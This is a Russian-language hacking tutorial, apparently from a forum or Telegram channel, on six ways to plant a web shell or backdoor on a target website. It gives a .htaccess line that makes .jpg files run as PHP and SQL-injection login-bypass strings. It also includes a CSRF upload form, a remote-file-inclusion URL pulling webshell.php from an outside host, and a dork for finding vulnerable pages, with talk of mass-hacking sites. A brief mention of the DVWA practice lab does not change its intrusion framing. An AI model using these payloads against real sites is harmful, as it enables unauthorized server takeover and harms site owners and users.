Способы загрузки шелла/бэкдора на сайт

Способы загрузки шелла/бэкдора на сайт

OVERMIND


В этой статье я хочу рассказать о чаще используемых способах заливки шелла на сайт. Web-shell - это некий вредоносный скрипт (программа), который злоумышленники используют для управления сайтами или серверами.


Способ 1

Найти на сайте форму для загрузки файлов/картинок. Допустим нам не удалось взломать админку сайта и мы пытаемся залить наш шелл с расширением .php.jpg .Если удалось, то мы увидим вместо картинки белое окно, мы кликаем правой кнопкой мыши и переходим по ссылке. В случае провала мы можем воспользоваться расширением chrome tamper data. Оно позволяет перехватить и изменить запрос как вы хотите. Если сайт проверяет, расширение файла, то сначала мы можем залить .htaccess файл с содержимым:

AddType application/x-httpd-php .jpg

Данная команда будет выполнять jpg файлы как php.

Способ 2

Воспользоваться программой для поиска админок на сайте - https://github.com/bdblackhat/admin-panel-finder. Когда программа нашла админку мы можем попробовать провести sql-injection. В поле логина и пароля сайта мы вбиваем код:

Код:

' or '1'='1
' OR 1=1/*

Если срабатывает, то мы попадаем в админку и действуем по 1 способу . Если же на сайте в панели администратора нет sql-injection, тогда мы можем попробовать сбрутить или же найти эксплоит под данную CMS.

Способ 3

В 3 способе мы будем искать sql-injection на самом сайте. Мы может делать это вручную или же воспользуемся sqlmap . На форуме достаточно тем, как можно проводить инъекции, так что зайду издалека. Итак, вот мы уже нашли таблицу с логином и паролем админа расшифровываем хэши заходим в админку и радуемся. Но допустим мы не смогли расшифровать пароль и все накрылось медным тазом, тогда мы должны проверить привилегии нашего юзера. Проверяем привилегии и загружаем мини-шелл. По каким-то причинам когда я хочу вставить код сайт выдает ошибку .


Способ 4

4 способ подразумевает csrf атаку. В ниже приведенном коде нам нужно заменить http:// на ссылку нашей цели. Выбрать шелл и нажать кнопку upload.

Код:

<form method="POST" action="http://" enctype="multipart/form-data" >
<input type="file" name="Filedata"></center><br>
<input type="submit" name="Submit" value="Upload">
</form>

Способ 5

Узнать как больше о вашей цели и подыскать эксплоит. Для этого есть очень интересный сайт - https://www.exploit-db.com. Никто и не отменял массовый взлом сайтов через уязвимости, но про это уже есть статья на форме.


Существует еще множество способов заливки шелла и рассказывать о каждом нет смысла. Если вы хотите потренироваться, то установите dvwa - это программа созданная для того, чтобы помочь профессионалам по безопасности протестировать их навыки и инструменты в легальном окружении .


Способ 6

Php-injection - это форма атаки на сайт, когда атакующий внедряет свой php-код в атакуемое php-приложение. 

www.site.ru?page=home.html

Выполнив команду мы подгрузим страницу home,html. Теперь мы попробуем подгрузить вредоносный шелл.

www.site.ru?page=http:/hacker.ru/webshell.php

Дорк: Inurl:page=



Больше на нашем канале @overmindtg

Report Page